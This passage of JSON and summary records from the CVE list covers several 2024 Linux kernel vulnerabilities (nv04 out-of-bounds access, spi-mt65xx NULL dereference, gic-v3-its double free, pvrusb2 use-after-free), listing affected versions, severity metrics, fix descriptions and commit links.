"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm: nv04: Fix out of bounds access\n\nWhen Output Resource (dcb-\u003eor) value is assigned in\nfabricate_dcb_output(), there may be out of bounds access to\ndac_users array in case dcb-\u003eor is zero because ffs(dcb-\u003eor) is\nused as index there.\nThe \u0027or\u0027 argument of fabricate_dcb_output() must be interpreted as a\nnumber of bit to set, not value.\n\nUtilize macros from \u0027enum nouveau_or\u0027 in calls instead of hardcoding.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:02:03.592Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c2b97f26f081ceec3298151481687071075a25cb"
},
{
"url": "https://git.kernel.org/stable/c/5050ae879a828d752b439e3827aac126709da6d1"
},
{
"url": "https://git.kernel.org/stable/c/097c7918fcfa1dee233acfd1f3029f00c3bc8062"
},
{
"url": "https://git.kernel.org/stable/c/df0991da7db846f7fa4ec6740350f743d3b69b04"
},
{
"url": "https://git.kernel.org/stable/c/5fd4b090304e450aa0e7cc9cc2b4873285c6face"
},
{
"url": "https://git.kernel.org/stable/c/6690cc2732e2a8d0eaca44dcbac032a4b0148042"
},
{
"url": "https://git.kernel.org/stable/c/26212da39ee14a52c76a202c6ae5153a84f579a5"
},
{
"url": "https://git.kernel.org/stable/c/cf92bb778eda7830e79452c6917efa8474a30c1e"
}
],
"title": "drm: nv04: Fix out of bounds access",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27008",
"datePublished": "2024-05-01T05:29:13.312Z",
"dateReserved": "2024-02-19T14:20:24.208Z",
"dateUpdated": "2025-11-04T17:16:46.306Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-27028 (GCVE-0-2024-27028)
Vulnerability from cvelistv5
Published
2024-05-01 12:53
Modified
2025-05-04 09:02
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
spi: spi-mt65xx: Fix NULL pointer access in interrupt handler
The TX buffer in spi_transfer can be a NULL pointer, so the interrupt
handler may end up writing to the invalid memory and cause crashes.
Add a check to trans->tx_buf before using it.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1ce24864bff40e11500a699789412115fdf244bf Version: 1ce24864bff40e11500a699789412115fdf244bf Version: 1ce24864bff40e11500a699789412115fdf244bf Version: 1ce24864bff40e11500a699789412115fdf244bf Version: 1ce24864bff40e11500a699789412115fdf244bf Version: 1ce24864bff40e11500a699789412115fdf244bf Version: 1ce24864bff40e11500a699789412115fdf244bf Version: 1ce24864bff40e11500a699789412115fdf244bf Version: 1ce24864bff40e11500a699789412115fdf244bf |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-27028",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-23T17:22:02.102985Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-08T18:43:33.098Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.949Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2342b05ec5342a519e00524a507f7a6ea6791a38"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/55f8ea6731aa64871ee6aef7dba53ee9f9f3b2f6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bcfcdf19698024565eff427706ebbd8df65abd11"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c10fed329c1c104f375a75ed97ea3abef0786d62"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/766ec94cc57492eab97cbbf1595bd516ab0cb0e4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62b1f837b15cf3ec2835724bdf8577e47d14c753"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bea82355df9e1c299625405b1947fc9b26b4c6d4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1784053cf10a14c4ebd8a890bad5cfe1bee51713"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a20ad45008a7c82f1184dc6dee280096009ece55"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/spi/spi-mt65xx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2342b05ec5342a519e00524a507f7a6ea6791a38",
"status": "affected",
"version": "1ce24864bff40e11500a699789412115fdf244bf",
"versionType": "git"
},
{
"lessThan": "55f8ea6731aa64871ee6aef7dba53ee9f9f3b2f6",
"status": "affected",
"version": "1ce24864bff40e11500a699789412115fdf244bf",
"versionType": "git"
},
{
"lessThan": "bcfcdf19698024565eff427706ebbd8df65abd11",
"status": "affected",
"version": "1ce24864bff40e11500a699789412115fdf244bf",
"versionType": "git"
},
{
"lessThan": "c10fed329c1c104f375a75ed97ea3abef0786d62",
"status": "affected",
"version": "1ce24864bff40e11500a699789412115fdf244bf",
"versionType": "git"
},
{
"lessThan": "766ec94cc57492eab97cbbf1595bd516ab0cb0e4",
"status": "affected",
"version": "1ce24864bff40e11500a699789412115fdf244bf",
"versionType": "git"
},
{
"lessThan": "62b1f837b15cf3ec2835724bdf8577e47d14c753",
"status": "affected",
"version": "1ce24864bff40e11500a699789412115fdf244bf",
"versionType": "git"
},
{
"lessThan": "bea82355df9e1c299625405b1947fc9b26b4c6d4",
"status": "affected",
"version": "1ce24864bff40e11500a699789412115fdf244bf",
"versionType": "git"
},
{
"lessThan": "1784053cf10a14c4ebd8a890bad5cfe1bee51713",
"status": "affected",
"version": "1ce24864bff40e11500a699789412115fdf244bf",
"versionType": "git"
},
{
"lessThan": "a20ad45008a7c82f1184dc6dee280096009ece55",
"status": "affected",
"version": "1ce24864bff40e11500a699789412115fdf244bf",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/spi/spi-mt65xx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: spi-mt65xx: Fix NULL pointer access in interrupt handler\n\nThe TX buffer in spi_transfer can be a NULL pointer, so the interrupt\nhandler may end up writing to the invalid memory and cause crashes.\n\nAdd a check to trans-\u003etx_buf before using it."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:02:37.127Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2342b05ec5342a519e00524a507f7a6ea6791a38"
},
{
"url": "https://git.kernel.org/stable/c/55f8ea6731aa64871ee6aef7dba53ee9f9f3b2f6"
},
{
"url": "https://git.kernel.org/stable/c/bcfcdf19698024565eff427706ebbd8df65abd11"
},
{
"url": "https://git.kernel.org/stable/c/c10fed329c1c104f375a75ed97ea3abef0786d62"
},
{
"url": "https://git.kernel.org/stable/c/766ec94cc57492eab97cbbf1595bd516ab0cb0e4"
},
{
"url": "https://git.kernel.org/stable/c/62b1f837b15cf3ec2835724bdf8577e47d14c753"
},
{
"url": "https://git.kernel.org/stable/c/bea82355df9e1c299625405b1947fc9b26b4c6d4"
},
{
"url": "https://git.kernel.org/stable/c/1784053cf10a14c4ebd8a890bad5cfe1bee51713"
},
{
"url": "https://git.kernel.org/stable/c/a20ad45008a7c82f1184dc6dee280096009ece55"
}
],
"title": "spi: spi-mt65xx: Fix NULL pointer access in interrupt handler",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27028",
"datePublished": "2024-05-01T12:53:19.069Z",
"dateReserved": "2024-02-19T14:20:24.210Z",
"dateUpdated": "2025-05-04T09:02:37.127Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35847 (GCVE-0-2024-35847)
Vulnerability from cvelistv5
Published
2024-05-17 14:47
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
irqchip/gic-v3-its: Prevent double free on error
The error handling path in its_vpe_irq_domain_alloc() causes a double free
when its_vpe_init() fails after successfully allocating at least one
interrupt. This happens because its_vpe_irq_domain_free() frees the
interrupts along with the area bitmap and the vprop_page and
its_vpe_irq_domain_alloc() subsequently frees the area bitmap and the
vprop_page again.
Fix this by unconditionally invoking its_vpe_irq_domain_free() which
handles all cases correctly and by removing the bitmap/vprop_page freeing
from its_vpe_irq_domain_alloc().
[ tglx: Massaged change log ]
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7d75bbb4bc1ad90386776459d37e4ddfe605671e Version: 7d75bbb4bc1ad90386776459d37e4ddfe605671e Version: 7d75bbb4bc1ad90386776459d37e4ddfe605671e Version: 7d75bbb4bc1ad90386776459d37e4ddfe605671e Version: 7d75bbb4bc1ad90386776459d37e4ddfe605671e Version: 7d75bbb4bc1ad90386776459d37e4ddfe605671e Version: 7d75bbb4bc1ad90386776459d37e4ddfe605671e Version: 7d75bbb4bc1ad90386776459d37e4ddfe605671e |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35847",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-12T15:13:12.628141Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-12T15:13:20.451Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.906Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f5417ff561b8ac9a7e53c747b8627a7ab58378ae"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b72d2b1448b682844f995e660b77f2a1fabc1662"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aa44d21574751a7d6bca892eb8e0e9ac68372e52"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5dbdbe1133911ca7d8466bb86885adec32ad9438"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dd681710ab77c8beafe2e263064cb1bd0e2d6ca9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/03170e657f62c26834172742492a8cb8077ef792"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5b012f77abde89bf0be8a0547636184fea618137"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c26591afd33adce296c022e3480dea4282b7ef91"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/irqchip/irq-gic-v3-its.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f5417ff561b8ac9a7e53c747b8627a7ab58378ae",
"status": "affected",
"version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
"versionType": "git"
},
{
"lessThan": "b72d2b1448b682844f995e660b77f2a1fabc1662",
"status": "affected",
"version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
"versionType": "git"
},
{
"lessThan": "aa44d21574751a7d6bca892eb8e0e9ac68372e52",
"status": "affected",
"version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
"versionType": "git"
},
{
"lessThan": "5dbdbe1133911ca7d8466bb86885adec32ad9438",
"status": "affected",
"version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
"versionType": "git"
},
{
"lessThan": "dd681710ab77c8beafe2e263064cb1bd0e2d6ca9",
"status": "affected",
"version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
"versionType": "git"
},
{
"lessThan": "03170e657f62c26834172742492a8cb8077ef792",
"status": "affected",
"version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
"versionType": "git"
},
{
"lessThan": "5b012f77abde89bf0be8a0547636184fea618137",
"status": "affected",
"version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
"versionType": "git"
},
{
"lessThan": "c26591afd33adce296c022e3480dea4282b7ef91",
"status": "affected",
"version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/irqchip/irq-gic-v3-its.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.14"
},
{
"lessThan": "4.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nirqchip/gic-v3-its: Prevent double free on error\n\nThe error handling path in its_vpe_irq_domain_alloc() causes a double free\nwhen its_vpe_init() fails after successfully allocating at least one\ninterrupt. This happens because its_vpe_irq_domain_free() frees the\ninterrupts along with the area bitmap and the vprop_page and\nits_vpe_irq_domain_alloc() subsequently frees the area bitmap and the\nvprop_page again.\n\nFix this by unconditionally invoking its_vpe_irq_domain_free() which\nhandles all cases correctly and by removing the bitmap/vprop_page freeing\nfrom its_vpe_irq_domain_alloc().\n\n[ tglx: Massaged change log ]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:44.998Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f5417ff561b8ac9a7e53c747b8627a7ab58378ae"
},
{
"url": "https://git.kernel.org/stable/c/b72d2b1448b682844f995e660b77f2a1fabc1662"
},
{
"url": "https://git.kernel.org/stable/c/aa44d21574751a7d6bca892eb8e0e9ac68372e52"
},
{
"url": "https://git.kernel.org/stable/c/5dbdbe1133911ca7d8466bb86885adec32ad9438"
},
{
"url": "https://git.kernel.org/stable/c/dd681710ab77c8beafe2e263064cb1bd0e2d6ca9"
},
{
"url": "https://git.kernel.org/stable/c/03170e657f62c26834172742492a8cb8077ef792"
},
{
"url": "https://git.kernel.org/stable/c/5b012f77abde89bf0be8a0547636184fea618137"
},
{
"url": "https://git.kernel.org/stable/c/c26591afd33adce296c022e3480dea4282b7ef91"
}
],
"title": "irqchip/gic-v3-its: Prevent double free on error",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35847",
"datePublished": "2024-05-17T14:47:26.175Z",
"dateReserved": "2024-05-17T13:50:33.105Z",
"dateUpdated": "2025-05-04T09:06:44.998Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26875 (GCVE-0-2024-26875)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: pvrusb2: fix uaf in pvr2_context_set_notify
[Syzbot reported]
BUG: KASAN: slab-use-after-free in pvr2_context_set_notify+0x2c4/0x310 drivers/media/usb/pvrusb2/pvrusb2-context.c:35
Read of size 4 at addr ffff888113aeb0d8 by task kworker/1:1/26
CPU: 1 PID: 26 Comm: kworker/1:1 Not tainted 6.8.0-rc1-syzkaller-00046-gf1a27f081c1f #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/25/2024
Workqueue: usb_hub_wq hub_event
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0xd9/0x1b0 lib/dump_stack.c:106
print_address_description mm/kasan/report.c:377 [inline]
print_report+0xc4/0x620 mm/kasan/report.c:488
kasan_report+0xda/0x110 mm/kasan/report.c:601
pvr2_context_set_notify+0x2c4/0x310 drivers/media/usb/pvrusb2/pvrusb2-context.c:35
pvr2_context_notify drivers/media/usb/pvrusb2/pvrusb2-context.c:95 [inline]
pvr2_context_disconnect+0x94/0xb0 drivers/media/usb/pvrusb2/pvrusb2-context.c:272
Freed by task 906:
kasan_save_stack+0x33/0x50 mm/kasan/common.c:47
kasan_save_track+0x14/0x30 mm/kasan/common.c:68
kasan_save_free_info+0x3f/0x60 mm/kasan/generic.c:640
poison_slab_object mm/kasan/common.c:241 [inline]
__kasan_slab_free+0x106/0x1b0 mm/kasan/common.c:257
kasan_slab_free include/linux/kasan.h:184 [inline]
slab_free_hook mm/slub.c:2121 [inline]
slab_free mm/slub.c:4299 [inline]
kfree+0x105/0x340 mm/slub.c:4409
pvr2_context_check drivers/media/usb/pvrusb2/pvrusb2-context.c:137 [inline]
pvr2_context_thread_func+0x69d/0x960 drivers/media/usb/pvrusb2/pvrusb2-context.c:158
[Analyze]
Task A set disconnect_flag = !0, which resulted in Task B's condition being met
and releasing mp, leading to this issue.
[Fix]
Place the disconnect_flag assignment operation after all code in pvr2_context_disconnect()
to avoid this issue.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e5be15c63804e05b5a94197524023702a259e308 Version: e5be15c63804e05b5a94197524023702a259e308 Version: e5be15c63804e05b5a94197524023702a259e308 Version: e5be15c63804e05b5a94197524023702a259e308 Version: e5be15c63804e05b5a94197524023702a259e308 Version: e5be15c63804e05b5a94197524023702a259e308 Version: e5be15c63804e05b5a94197524023702a259e308 Version: e5be15c63804e05b5a94197524023702a259e308 Version: e5be15c63804e05b5a94197524023702a259e308 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.434Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ed8000e1e8e9684ab6c30cf2b526c0cea039929c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d29ed08964cec8b9729bc55c7bb23f679d7a18fb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ab896d93fd6a2cd1afeb034c3cc9226cb499209f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eb6e9dce979c08210ff7249e5e0eceb8991bfcd7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3a1ec89708d2e57e2712f46241282961b1a7a475"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8e60b99f6b7ccb3badeb512f5eb613ad45904592"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/40cd818fae875c424a8335009db33c7b5a07de3a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eaa410e05bdf562c90b23cdf2d9327f9c4625e16"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0a0b79ea55de8514e1750884e5fec77f9fdd01ee"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
